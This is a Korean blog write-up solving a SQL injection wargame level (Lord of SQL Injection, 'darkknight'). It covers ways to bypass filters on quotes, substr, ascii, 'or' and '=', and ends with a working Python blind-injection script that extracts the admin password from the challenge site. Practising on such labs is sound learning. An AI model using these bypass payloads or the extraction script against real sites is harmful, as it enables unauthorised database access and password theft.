Lord of sql injection [12]

 

[문제 12]

 

이번 문제는 substr(), ascii(), ' (싱글쿼터) ..등 많이 막아놨네요.

일단 pw를 일치 시켜야 풀리는 문제입니다.

 

전에 문제들과 다르게 싱글쿼터, substr을 막아놓으니 조금 복잡해졌네요.

일단 ' 를 어떻게 막아야 할지 고민해봅니다.

 

id와 pw라는 파라미터 값은 이미  싱글쿼테이션으로 둘러쌓여 있어서 

문자열을 종료 시키고 뒤에 쿼리문을 이어줘야 하는데, 그러려면 어쩔 수 없이 싱글쿼테이션이 들어갑니다.

 

그렇다면 no변수는 어떨까요?

 

no는 ' ' 로 받지않는 유일한 변수 입니다. 그렇다면 이 변수에 값을 넣어보도록 하겠습니다.

 

 

** 아 참고로 해당 사이트 화면은 and를 &&로 해도 먹히고,

비트연산자(&)로 해도 실행이 되더라구요..(왜이런지 아시는분) **

 

 

or 는 || 로 우회하고, = 은 like로 우회를 하고, 싱글쿼터는 ""로 우회 할 수 있습니다. 

 

 

 

또 다른 방법으로 해보자면 ascii코드로 넣는 방법이 있겠네요.

ex) beebox에서 사용했던 것 처럼,

substring(pw,1,1)='a' 이런방법이 아닌

ascii(substring(pw,1,1)) = 98# 이런 방법으로 우회 할 수 있습니다.

 

++ 

substring(pw,1,1) = char(98)# 이렇게도 우회가능함.

 

일단 저는 짜놓았던 python코드가 있기에 싱글쿼터를 더블쿼터로만 바꿔줄게요!

 

마지막으로 substring 함수만 우회를 하면 되는데, 저번에는 문자열 자체 (substr)을 막아놓아서 substring이라는

풀네임으로 우회하였지만 이번엔 함수자체가 안먹히네요.  그렇다면 substring대신 쓸 수 있는 함수를 찾아봅시다.

 

 

# 키워드 우회

substr('abc',1,1) == right(left('abc',1),1)

substr('abc',2,1) == right(left('abc',2),1)

검색해보니 이렇게 우회 할 수 있다고 하네요.

 

https://iwantadmin.tistory.com/7

이렇게 우회 기법들을 찾아보니 정말 다양하네요!

 

substr역할을 해주는 함수는 mid도 있고, 섞어서도 얼마든지 사용이 가능하더라고요!

 

 

extbrain.tistory.com/62

[MySQL] 문자열 부분 가져오기 (LEFT, MID, RIGHT 함수)

 

위 블로그를 참고 하셔서, left, mid, right 함수의 사용법을 익힌 후 우회해보도록 하겠습니다.

 

length 즉 길이 = 8

 

안에 data를 뽑아내보도록 하겠습니다. 기본 코드에서 몇가지만 고쳐서 실행시켜주면 됩니당.

 

import requests
from bs4 import BeautifulSoup

query1 = "1 ||id like \"admin\" && mid(pw,%d,1) like %s #"
dbname = []
password = []

word = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '\"a\"', '\"b\"', '\"c\"', '\"d\"', '\"e\"', '\"f\"', '\"g\"',
        '\"h\"', '\"i\"', '\"j\"', '\"k\"', '\"l\"', '\"m\"', '\"n\"', '\"o\"', '\"p\"', '\"q\"', '\"r\"', '\"s\"',
        '\"t\"', '\"u\"', '\"v\"', '\"w\"', '\"x\"', '\"y\"', '\"z\"']
#print("상태 코드 : ",res.status_code)

print("========= Blind SQL injection ===========")
# 1. 사용하고 있는 DB 길이 알아내기.

print("######################data 분석 중")

num = 1
while num <= 8:

    for src in word:
        dbname = [query1 % (num, src)]

        cookies = {'PHPSESSID': '27g5thpe9ib9v6o1vq12kvhpv6'}
        params = {'id': "admin", 'pw': "0 &&", 'no': dbname}
        res = requests.get('https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php', params=params, cookies=cookies)
        code = res.text  # 전체 코드
        search = "Hello admin"  # 참일시 나오는 결과 값

        if search in code: #코드안에 참일 시 나오는 값이 들어가 있다면
            print("Data : ", src)
            password += src
         #   print(dbname)
            break


    num = num+1

print("###########################완료")
print('pwd : ', '_'.join(password))

 

ㅋㅋㅋ가독성 좀 떨어져도 만능 코드네요^_^

 

data를 pw에 넣어주면

 

 

Clear

참고로 얘는 주석으로 뒤에 지워주면 안됩니다.